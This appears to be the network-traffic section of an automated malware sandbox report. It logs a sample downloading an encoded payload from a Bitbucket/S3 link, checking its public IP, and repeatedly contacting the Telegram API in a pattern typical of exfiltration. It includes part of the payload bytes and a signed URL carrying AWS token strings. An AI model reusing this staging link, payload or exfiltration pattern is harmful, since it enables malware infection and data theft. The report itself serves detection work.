                                                                                                                Nov 26, 2024 08:26:44.076633930 CET44350047149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.076868057 CET44350047149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.076953888 CET50047443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.077373981 CET50047443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.078699112 CET50055443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.078733921 CET44350055149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.078799963 CET50055443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.079068899 CET50055443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.079082966 CET44350055149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.095063925 CET44350049149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.095279932 CET44350049149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.095350981 CET50049443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.095788956 CET50049443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.096820116 CET50056443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.096868038 CET44350056149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.097048998 CET50056443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.097337008 CET50056443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.097353935 CET44350056149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.123539925 CET44350048149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.123625040 CET44350048149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.123852968 CET50048443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.124126911 CET50048443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.125546932 CET50057443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.125598907 CET44350057149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.125686884 CET50057443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.125965118 CET50057443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.125982046 CET44350057149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:45.487220049 CET44350057149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:45.489825010 CET50057443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:45.489846945 CET44350057149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:45.489928007 CET50057443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:45.489933014 CET44350057149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:45.498245955 CET44350055149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:45.499710083 CET50055443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:45.499738932 CET44350055149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:45.499800920 CET50055443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:45.499809027 CET44350055149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:45.557514906 CET44350056149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:45.559333086 CET50056443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:45.559359074 CET44350056149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:45.559421062 CET50056443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:45.559432983 CET44350056149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:46.030343056 CET44350057149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:46.030421019 CET44350057149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:46.030522108 CET50057443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:46.066373110 CET44350055149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:46.066478968 CET44350055149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:46.066536903 CET50055443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:46.115098000 CET44350056149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:46.115204096 CET44350056149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:46.115283966 CET50056443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:49.552403927 CET50055443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:49.553378105 CET50070443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:49.553416967 CET44350070149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:49.553572893 CET50070443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:49.553765059 CET50070443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:49.553778887 CET44350070149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:49.812751055 CET50056443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:49.813354015 CET50071443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:49.813369036 CET44350071149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:49.813440084 CET50071443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:49.813709021 CET50071443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:49.813719034 CET44350071149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:50.191564083 CET50057443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:50.192121983 CET50074443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:50.192208052 CET44350074149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:50.192373991 CET50074443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:50.192543983 CET50074443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:50.192574024 CET44350074149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:50.918680906 CET44350070149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:50.920572042 CET50070443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:50.920614004 CET44350070149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:50.920675993 CET50070443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:50.920682907 CET44350070149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:51.271056890 CET44350071149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:51.313810110 CET50071443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:51.465322971 CET44350070149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:51.465464115 CET44350070149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:51.465524912 CET50070443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:51.647811890 CET44350074149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:51.688827038 CET50074443192.168.2.7149.154.167.220

                                                                                                                UDP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Nov 26, 2024 08:24:41.299941063 CET6513053192.168.2.71.1.1.1
                                                                                                                Nov 26, 2024 08:24:41.445080042 CET53651301.1.1.1192.168.2.7
                                                                                                                Nov 26, 2024 08:24:43.948023081 CET6274353192.168.2.71.1.1.1
                                                                                                                Nov 26, 2024 08:24:44.191188097 CET53627431.1.1.1192.168.2.7
                                                                                                                Nov 26, 2024 08:24:54.169706106 CET5961253192.168.2.71.1.1.1
                                                                                                                Nov 26, 2024 08:24:54.310570955 CET53596121.1.1.1192.168.2.7
                                                                                                                Nov 26, 2024 08:25:06.254781008 CET5437253192.168.2.71.1.1.1
                                                                                                                Nov 26, 2024 08:25:06.402973890 CET53543721.1.1.1192.168.2.7
                                                                                                                Nov 26, 2024 08:25:24.926594019 CET5490853192.168.2.71.1.1.1
                                                                                                                Nov 26, 2024 08:25:25.067562103 CET53549081.1.1.1192.168.2.7

                                                                                                                DNS Queries

                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Nov 26, 2024 08:24:41.299941063 CET192.168.2.71.1.1.10xf56eStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:43.948023081 CET192.168.2.71.1.1.10x345eStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:54.169706106 CET192.168.2.71.1.1.10x4e76Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:25:06.254781008 CET192.168.2.71.1.1.10x43eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:25:24.926594019 CET192.168.2.71.1.1.10xfca1Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                DNS Answers

                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Nov 26, 2024 08:24:41.445080042 CET1.1.1.1192.168.2.70xf56eNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:41.445080042 CET1.1.1.1192.168.2.70xf56eNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:41.445080042 CET1.1.1.1192.168.2.70xf56eNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:44.191188097 CET1.1.1.1192.168.2.70x345eNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:44.191188097 CET1.1.1.1192.168.2.70x345eNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:44.191188097 CET1.1.1.1192.168.2.70x345eNo error (0)s3-w.us-east-1.amazonaws.com16.182.70.225A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:44.191188097 CET1.1.1.1192.168.2.70x345eNo error (0)s3-w.us-east-1.amazonaws.com52.217.225.41A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:44.191188097 CET1.1.1.1192.168.2.70x345eNo error (0)s3-w.us-east-1.amazonaws.com52.217.117.217A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:44.191188097 CET1.1.1.1192.168.2.70x345eNo error (0)s3-w.us-east-1.amazonaws.com3.5.25.179A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:44.191188097 CET1.1.1.1192.168.2.70x345eNo error (0)s3-w.us-east-1.amazonaws.com3.5.29.61A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:44.191188097 CET1.1.1.1192.168.2.70x345eNo error (0)s3-w.us-east-1.amazonaws.com3.5.25.213A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:44.191188097 CET1.1.1.1192.168.2.70x345eNo error (0)s3-w.us-east-1.amazonaws.com52.217.137.177A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:44.191188097 CET1.1.1.1192.168.2.70x345eNo error (0)s3-w.us-east-1.amazonaws.com3.5.29.69A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:54.310570955 CET1.1.1.1192.168.2.70x4e76No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:54.310570955 CET1.1.1.1192.168.2.70x4e76No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:54.310570955 CET1.1.1.1192.168.2.70x4e76No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:54.310570955 CET1.1.1.1192.168.2.70x4e76No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:54.310570955 CET1.1.1.1192.168.2.70x4e76No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:24:54.310570955 CET1.1.1.1192.168.2.70x4e76No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:25:06.402973890 CET1.1.1.1192.168.2.70x43eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                Nov 26, 2024 08:25:25.067562103 CET1.1.1.1192.168.2.70xfca1No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                HTTP Request Dependency Graph

                                                                                                                • bitbucket.org
                                                                                                                • bbuseruploads.s3.amazonaws.com
                                                                                                                • api.telegram.org
                                                                                                                • checkip.dyndns.org

                                                                                                                HTTP Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.749710132.226.8.169807240C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 26, 2024 08:24:54.457456112 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Nov 26, 2024 08:24:56.550540924 CET272INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 26 Nov 2024 07:24:56 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 103
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.749741132.226.8.169807660C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 26, 2024 08:25:06.281001091 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Nov 26, 2024 08:25:09.056787014 CET272INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 26 Nov 2024 07:25:08 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 103
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.749758132.226.8.169807924C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 26, 2024 08:25:13.399166107 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Nov 26, 2024 08:25:14.908473969 CET272INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 26 Nov 2024 07:25:14 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 103
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                HTTPS Proxied Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.749702185.166.143.484437128C:\Users\user\Desktop\EPTMAcgvNZ.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:24:43 UTC187OUTGET /ntim1478/gpmaw/downloads/240_Cobsfhiygmx HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                Host: bitbucket.org
                                                                                                                2024-11-26 07:24:43 UTC5753INHTTP/1.1 302 Found
                                                                                                                Date: Tue, 26 Nov 2024 07:24:43 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Content-Length: 0
                                                                                                                Server: AtlassianEdge
                                                                                                                Location: https://bbuseruploads.s3.amazonaws.com/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/d4025bf5-bb79-4526-ae33-7a2e4ade5334/240_Cobsfhiygmx?response-content-disposition=attachment%3B%20filename%3D%22240_Cobsfhiygmx%22&AWSAccessKeyId=ASIA6KOSE3BNDW6O2X3G&Signature=2chtfxoFxVQH%2B%2Bqk1LYozF4rZ%2B0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEID%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIAD1NYAHfsojP08kbtMfuAOMGAEvCe3UKQ8UuqEcK7AUAiBLFY8fCNgsv5yXRVa1b5QNwmml9rALfaMKgd8jdopQyyqnAggoEAAaDDk4NDUyNTEwMTE0NiIMfAZ8Us6gNEO9lXe4KoQC4H3JCLPChoPHuNq8eVCV0VMfd0IICdqgHHTSS7ANzAU4dth3BBqgfGziNIRR91nsxqTwbAAkR9UbQFCz06yniB%2BRGncxwoJCSnWAnC0PMUZxzU%2B%2BmfP%2FabATRJ9BblkOl1DPLVzf%2FJK1O6swKVUCdmPXu9Jkpx0Zs3JpqA2SUfKf9kMOAbhud5%2B1kxcQ6T7uVBLz8q4gm46LDNyHkSdwPE%2FQPgP3oIs4bSwQ5TMxJgIO5MbAPud6%2Bz%2FVgFMzq8rBGnCYT%2F4UbUFOLOxmP7f%2FDVGr5XggPH5IbOKF9s2N5SU%2B%2B%2BFpTKfe55tJ6Uv%2BfHOKA0oQO%2BP7Wdzhn3fln1%2B7PoGjL2cwk%2BqVugY6ngGYCJOQQCMy7ggWig9zh2r3BmXcbjQcgkcKcTBPK9af%2FavWTGfdHkiCsWui9miH9txKAmMYOb08nXhpPgiwJXB [TRUNCATED]
                                                                                                                Expires: Tue, 26 Nov 2024 07:24:43 GMT
                                                                                                                Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                X-Used-Mesh: False
                                                                                                                Vary: Accept-Language, Origin
                                                                                                                Content-Language: en
                                                                                                                X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                X-Dc-Location: Micros-3
                                                                                                                X-Served-By: e6e5cbe73c66
                                                                                                                X-Version: 0fc738d114da
                                                                                                                X-Static-Version: 0fc738d114da
                                                                                                                X-Request-Count: 1263
                                                                                                                X-Render-Time: 0.04105949401855469
                                                                                                                X-B3-Traceid: c290021cf1fc43d99e1138be62a994ab
                                                                                                                X-B3-Spanid: c9c43378a83c3f25
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam- [TRUNCATED]
                                                                                                                X-Usage-Quota-Remaining: 999210.284
                                                                                                                X-Usage-Request-Cost: 801.87
                                                                                                                X-Usage-User-Time: 0.020435
                                                                                                                X-Usage-System-Time: 0.003621
                                                                                                                X-Usage-Input-Ops: 0
                                                                                                                X-Usage-Output-Ops: 0
                                                                                                                Age: 0
                                                                                                                X-Cache: MISS
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-Xss-Protection: 1; mode=block
                                                                                                                Atl-Traceid: c290021cf1fc43d99e1138be62a994ab
                                                                                                                Atl-Request-Id: c290021c-f1fc-43d9-9e11-38be62a994ab
                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                Server-Timing: atl-edge;dur=152,atl-edge-internal;dur=4,atl-edge-upstream;dur=150,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.74970316.182.70.2254437128C:\Users\user\Desktop\EPTMAcgvNZ.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-26 07:24:45 UTC1303OUTGET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/d4025bf5-bb79-4526-ae33-7a2e4ade5334/240_Cobsfhiygmx?response-content-disposition=attachment%3B%20filename%3D%22240_Cobsfhiygmx%22&AWSAccessKeyId=ASIA6KOSE3BNDW6O2X3G&Signature=2chtfxoFxVQH%2B%2Bqk1LYozF4rZ%2B0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEID%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIAD1NYAHfsojP08kbtMfuAOMGAEvCe3UKQ8UuqEcK7AUAiBLFY8fCNgsv5yXRVa1b5QNwmml9rALfaMKgd8jdopQyyqnAggoEAAaDDk4NDUyNTEwMTE0NiIMfAZ8Us6gNEO9lXe4KoQC4H3JCLPChoPHuNq8eVCV0VMfd0IICdqgHHTSS7ANzAU4dth3BBqgfGziNIRR91nsxqTwbAAkR9UbQFCz06yniB%2BRGncxwoJCSnWAnC0PMUZxzU%2B%2BmfP%2FabATRJ9BblkOl1DPLVzf%2FJK1O6swKVUCdmPXu9Jkpx0Zs3JpqA2SUfKf9kMOAbhud5%2B1kxcQ6T7uVBLz8q4gm46LDNyHkSdwPE%2FQPgP3oIs4bSwQ5TMxJgIO5MbAPud6%2Bz%2FVgFMzq8rBGnCYT%2F4UbUFOLOxmP7f%2FDVGr5XggPH5IbOKF9s2N5SU%2B%2B%2BFpTKfe55tJ6Uv%2BfHOKA0oQO%2BP7Wdzhn3fln1%2B7PoGjL2cwk%2BqVugY6ngGYCJOQQCMy7ggWig9zh2r3BmXcbjQcgkcKcTBPK9af%2FavWTGfdHkiCsWui9miH9txKAmMYOb08nXhpPgiwJXBhhGW9aVZgTRRjdb2Sv%2FPIWSb4mnaUlx07x5vLgIpzF [TRUNCATED]
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                Host: bbuseruploads.s3.amazonaws.com
                                                                                                                2024-11-26 07:24:46 UTC544INHTTP/1.1 200 OK
                                                                                                                x-amz-id-2: SY6tbCyvefy+FP58W4HPlmDrKp7NC6clrX5TRPGCBdCUxC4E/U5Iak7N2IDKhgE5iMjwJ+/tRHA=
                                                                                                                x-amz-request-id: CNQ2XMRJ6F4HXH0M
                                                                                                                Date: Tue, 26 Nov 2024 07:24:46 GMT
                                                                                                                Last-Modified: Sun, 13 Oct 2024 21:45:00 GMT
                                                                                                                ETag: "fd32db13b598ad70b971a451dbafcd53"
                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                x-amz-version-id: PjPSYxMoVKIx7__cOzoruubIprFqYDE.
                                                                                                                Content-Disposition: attachment; filename="240_Cobsfhiygmx"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 749280
                                                                                                                Server: AmazonS3
                                                                                                                Connection: close
                                                                                                                2024-11-26 07:24:46 UTC16384INData Raw: 72 62 57 73 59 43 71 75 75 46 49 63 47 69 73 6a 49 52 30 56 47 53 30 64 48 53 59 69 47 52 59 64 47 79 41 59 46 68 6b 6a 46 78 30 73 47 79 67 56 4c 52 6b 75 4b 43 34 65 48 78 34 64 4b 78 67 74 49 69 67 6d 49 69 51 57 4b 69 73 6f 4a 52 59 64 47 78 69 74 74 61 78 67 4b 71 36 34 55 6c 55 6a 46 69 63 61 48 42 30 74 47 79 45 73 72 62 57 73 59 43 71 75 75 46 4c 72 35 6c 63 4a 43 2b 6c 4a 36 2f 7a 73 37 31 4c 6b 52 66 4c 73 36 75 77 4b 44 42 50 6a 52 2b 66 37 36 76 51 48 2b 55 58 36 39 2f 33 79 44 51 51 48 2b 30 54 33 38 66 66 36 45 41 4a 47 2f 76 72 33 39 77 51 48 45 65 35 51 37 76 72 79 36 77 2f 78 52 66 66 73 37 50 6f 51 45 77 7a 70 51 2b 54 6e 35 65 4d 52 37 31 48 34 36 76 66 6e 58 52 4e 53 2f 6a 37 71 37 75 33 76 56 2b 35 42 35 76 66 31 37 6c 51 4d 58 76 73
                                                                                                                Data Ascii: rbWsYCquuFIcGisjIR0VGS0dHSYiGRYdGyAYFhkjFx0sGygVLRkuKC4eHx4dKxgtIigmIiQWKisoJRYdGxittaxgKq64UlUjFicaHB0tGyEsrbWsYCquuFLr5lcJC+lJ6/zs71LkRfLs6uwKDBPjR+f76vQH+UX69/3yDQQH+0T38ff6EAJG/vr39wQHEe5Q7vry6w/xRffs7PoQEwzpQ+Tn5eMR71H46vfnXRNS/j7q7u3vV+5B5vf17lQMXvs
                                                                                                                2024-11-26 07:24:46 UTC480INData Raw: 5a 52 6c 35 61 6b 51 2b 51 34 65 53 49 47 47 78 68 49 69 33 4f 33 51 34 52 44 76 54 51 45 74 77 6f 38 72 58 38 77 57 75 7a 38 73 5a 67 30 46 59 49 34 2f 4b 6c 7a 64 61 32 45 47 6f 6d 62 51 5a 39 4f 4f 41 57 48 4e 4e 75 79 6e 55 34 4d 4c 75 50 5a 4e 57 63 34 73 69 4e 59 58 4a 45 74 59 4e 33 77 73 52 74 71 53 75 66 79 74 56 4d 56 64 2b 51 36 62 6a 38 39 79 62 2b 43 4f 58 4d 79 54 65 43 71 63 67 45 4d 63 33 58 7a 7a 39 31 43 48 6c 43 38 55 4c 6e 74 64 42 56 47 63 74 4c 32 76 33 59 69 35 39 76 37 69 4d 59 5a 6e 57 48 55 59 50 38 33 7a 2b 4e 74 78 42 59 48 44 48 31 7a 64 44 5a 59 6d 44 4e 49 4a 77 49 43 33 51 2b 6b 75 79 4c 4d 47 7a 4f 62 58 4d 65 2f 72 39 6b 42 32 55 31 6c 55 67 6c 79 2f 4e 58 2b 69 59 66 6d 45 39 59 58 72 59 4f 71 61 32 37 58 44 4d 46 76 49
